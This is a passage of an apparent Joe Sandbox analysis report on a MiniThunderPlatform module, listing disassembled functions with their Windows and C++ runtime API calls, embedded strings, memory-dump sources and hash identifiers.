                                                                                                                                              • Instruction Fuzzy Hash: D7317730A00706DBDB18DFA8C998BEEB7F5FF48311F04415CE86A97291CB35AA05DB00
                                                                                                                                              Function 10059040 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL ref: 10059068
                                                                                                                                              • ResetEvent.KERNEL32(00000000), ref: 10059081
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 1005908C
                                                                                                                                              • ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?,76105E10,?,00000000), ref: 100590D3
                                                                                                                                              • ResetEvent.KERNEL32(00000000,?,00000000), ref: 1005911F
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(1030012C), ref: 1005912A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$D@std@@EventLeaveResetU?$char_traits@V?$allocator@$??$?D@1@@std@@D@2@@0@0@EnterV?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4233836449-0
                                                                                                                                              • Opcode ID: 0cfd6d3458b016e3917f266db0d9547cea12f37ecf008165a5ba941d9dd75da1
                                                                                                                                              • Instruction ID: 9c55a2885134098e6b06a58272c8afd9762f8b76a7e084fe52891331506edb5c
                                                                                                                                              • Opcode Fuzzy Hash: 0cfd6d3458b016e3917f266db0d9547cea12f37ecf008165a5ba941d9dd75da1
                                                                                                                                              • Instruction Fuzzy Hash: A1319E7A504741DFC724DF14C988A9ABBF4FB8A750F404A1DF84683752C735A948CBA2
                                                                                                                                              Function 1020D660 Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 1020D668
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 1020D688
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 1020D6B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 5f3b045570b1811727bd6db85400a9c61df67e20953111073af2e24995f9c22b
                                                                                                                                              • Instruction ID: 05d545eb83efc4467927b8e53e28612a8652d3d7c572c706f6abd34ce3465204
                                                                                                                                              • Opcode Fuzzy Hash: 5f3b045570b1811727bd6db85400a9c61df67e20953111073af2e24995f9c22b
                                                                                                                                              • Instruction Fuzzy Hash: A22123312007218FC360DF19E888A5AF7F8FB496207014A59E54AC7B61C3B1FC85CF90
                                                                                                                                              Function 1007533E Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10075343
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1007536D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075377
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007538D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100753B2
                                                                                                                                                • Part of subcall function 1007518D: __EH_prolog.LIBCMT ref: 10075192
                                                                                                                                                • Part of subcall function 1007518D: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10075215
                                                                                                                                                • Part of subcall function 1007518D: memcpy.MSVCR71(000000AC,?,?), ref: 1007523E
                                                                                                                                                • Part of subcall function 1007518D: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007526B
                                                                                                                                                • Part of subcall function 1007518D: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1007529E
                                                                                                                                                • Part of subcall function 1007518D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752BF
                                                                                                                                                • Part of subcall function 1007518D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100752CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100753D8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?assign@?$basic_string@V12@V12@@$??0?$basic_string@H_prolog$??1?$basic_string@memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 874716554-0
                                                                                                                                              • Opcode ID: 7734128b63b5be517e434851fc16a1d52f6dc123bfd5fae37aac1f9f02cd7cfc
                                                                                                                                              • Instruction ID: 1fd25b81c00395f0ed3aed341ee64dd6d318196844c7df1cefc9176c1f55dfa2
                                                                                                                                              • Opcode Fuzzy Hash: 7734128b63b5be517e434851fc16a1d52f6dc123bfd5fae37aac1f9f02cd7cfc
                                                                                                                                              • Instruction Fuzzy Hash: 2F212275500654DFCB25CF68C888AEABBF4FF18310F044A5EE8AB83251DB74A904CB50
                                                                                                                                              Function 100494E0 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 100494F0
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 10049501
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1004951C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1004951F
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1004952E
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10049535
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2978645861-0
                                                                                                                                              • Opcode ID: 1d0e4b08f21900218a12b53b3ca1366a1d70b0c6f762efe6f075e5c258047cb2
                                                                                                                                              • Instruction ID: b46e3823c683ede66b4881a3a2f4396d16374112aaa1029d14e6442ee641b66b
                                                                                                                                              • Opcode Fuzzy Hash: 1d0e4b08f21900218a12b53b3ca1366a1d70b0c6f762efe6f075e5c258047cb2
                                                                                                                                              • Instruction Fuzzy Hash: 35F0D1322006544FC321DB69ACCC9ABB7E8EB49650740443AE65283601C732F845DB24
                                                                                                                                              Function 10005179 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000517E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(invalid map/set<T> iterator,100066D7,10311338), ref: 1000519D
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(102B24A0), ref: 100051C3
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,100066D7,10311338), ref: 100053D2
                                                                                                                                              Strings
                                                                                                                                              • invalid map/set<T> iterator, xrefs: 10005195
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@??3@ExceptionThrowV01@@
                                                                                                                                              • String ID: invalid map/set<T> iterator
                                                                                                                                              • API String ID: 1214878774-152884079
                                                                                                                                              • Opcode ID: 9a7b3dee03fd78317935127dd49073a79d2bc71a313441bf593faec73b73ee5e
                                                                                                                                              • Instruction ID: 22bad6acc85c1995b1529809b22b30cd1a58a219da0e84c24cd2dfb7357a9777
                                                                                                                                              • Opcode Fuzzy Hash: 9a7b3dee03fd78317935127dd49073a79d2bc71a313441bf593faec73b73ee5e
                                                                                                                                              • Instruction Fuzzy Hash: 49A158709083819FE705CF64C094B9ABBE2FF46385F29859CD4994F256C7B2ED85CBA0
                                                                                                                                              Function 100610B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 173COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldiv
                                                                                                                                              • String ID: .\file_io_unit.cpp$map_it != _data_map.end()$thunder_assert
                                                                                                                                              • API String ID: 3732870572-689295920
                                                                                                                                              • Opcode ID: 10cea28d6aa2a4958a3025589bda4ac48d7be1c1c7b726d56ed29937c777f82d
                                                                                                                                              • Instruction ID: 23db44076621407480f3e5c19e63b84f3dae63fe6758bf9f28f0cf884636a154
                                                                                                                                              • Opcode Fuzzy Hash: 10cea28d6aa2a4958a3025589bda4ac48d7be1c1c7b726d56ed29937c777f82d
                                                                                                                                              • Instruction Fuzzy Hash: 0551BC35A082528FCB04DF28C89099AB7E3FBC9790F1A865DE959DB341D630EC41CBD2
                                                                                                                                              Function 1004D3A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,?), ref: 1004D3CD
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1004D3DF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1004D3FB
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1004D418
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 113201077-1285458680
                                                                                                                                              • Opcode ID: 69a3b4ad00ace0b452f68a061206b8c08c54546a04e02b1c3109017f328ba21a
                                                                                                                                              • Instruction ID: 329952a3e98ea39d1903412374e982b2615215e9561aa6454ceef696d2f345ca
                                                                                                                                              • Opcode Fuzzy Hash: 69a3b4ad00ace0b452f68a061206b8c08c54546a04e02b1c3109017f328ba21a
                                                                                                                                              • Instruction Fuzzy Hash: AB518DB42086819FC314DF08C194A5AFBE5FF89714F2586ADE4998B352C730FC81CB99
                                                                                                                                              Function 1004D560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,?), ref: 1004D58D
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 1004D59F
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1004D5BB
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1004D5D8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 113201077-1285458680
                                                                                                                                              • Opcode ID: 0e3d2ddfbae7fef17cf14dd01228d1820a261707e481c9047f78757181cf8b7b
                                                                                                                                              • Instruction ID: 8276d52cb4545417f68e6cb2109bc244d618a22bb3e0a33f9e8e804eee490cc3
                                                                                                                                              • Opcode Fuzzy Hash: 0e3d2ddfbae7fef17cf14dd01228d1820a261707e481c9047f78757181cf8b7b
                                                                                                                                              • Instruction Fuzzy Hash: AC5157746086819FC314DF18C194A5AFBE5FB89704F25C69EE49A8B352C730EC82CF95
                                                                                                                                              Function 100500E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 1005012F
                                                                                                                                              • SetEvent.KERNEL32(?), ref: 10050191
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EventMultipleObjectsWait
                                                                                                                                              • String ID: .\wait_objects_thread.cpp$NULL$thunder_assert
                                                                                                                                              • API String ID: 1465615540-2870812305
                                                                                                                                              • Opcode ID: a72809e59deed718fe19b25bde3e531570817ac5de63356a4edb7e04e55d80fc
                                                                                                                                              • Instruction ID: 6161766d7b5244d367ba1e09492ece1bfa79e049679f71e6df23e194daea5f3e
                                                                                                                                              • Opcode Fuzzy Hash: a72809e59deed718fe19b25bde3e531570817ac5de63356a4edb7e04e55d80fc
                                                                                                                                              • Instruction Fuzzy Hash: 1631F631A00A059BCB14CB68CD85FAFB3B8FB48310F104A1DF916D7680CB34B805C79A
                                                                                                                                              Function 100A11C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100A12E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID: .\ftp_data_pipe.cpp$_all_encoded_filename.size()>0$thunder_assert
                                                                                                                                              • API String ID: 2599707790-2298801233
                                                                                                                                              • Opcode ID: 5863e0b867f9171ea70954b7f923215adff8169744272c9f4655a14f53356da7
                                                                                                                                              • Instruction ID: b5696a8a1b727a72185821f1fb1617dcee1d8d347122fc3e8429af0f08a9d730
                                                                                                                                              • Opcode Fuzzy Hash: 5863e0b867f9171ea70954b7f923215adff8169744272c9f4655a14f53356da7
                                                                                                                                              • Instruction Fuzzy Hash: 4231AC75604700EFD351CB68CC45BEBB7E8EB99B90F408A0DF5AA82281DB70A504CB62
                                                                                                                                              Function 10098340 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Set-Cookie), ref: 100983B9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100983DC
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10097132
                                                                                                                                                • Part of subcall function 100970D0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 10097149
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10097164
                                                                                                                                                • Part of subcall function 100970D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10098303
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1009840B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009842F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@std@@V01@@V?$basic_string@$??$?8D@2@@0@$??$?9D@2@@0@0@
                                                                                                                                              • String ID: Set-Cookie
                                                                                                                                              • API String ID: 3682374639-497240083
                                                                                                                                              • Opcode ID: cc579d2685e6c3f9274c0867a4561da94171a61c8a5ddfeaaa38870afe555fff
                                                                                                                                              • Instruction ID: b31ec60a126572c5ceba5bde24653198ff7dc890f681b18011999626125d3121
                                                                                                                                              • Opcode Fuzzy Hash: cc579d2685e6c3f9274c0867a4561da94171a61c8a5ddfeaaa38870afe555fff
                                                                                                                                              • Instruction Fuzzy Hash: 77315A725087419FC314CF28C894A5FFBE8FF99754F004A1DF59A83261DB74A949CB62
                                                                                                                                              Function 100983A5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Set-Cookie), ref: 100983B9
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,1027B92C,00000000,00000002), ref: 10093FB5
                                                                                                                                                • Part of subcall function 10093F80: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10093FD4
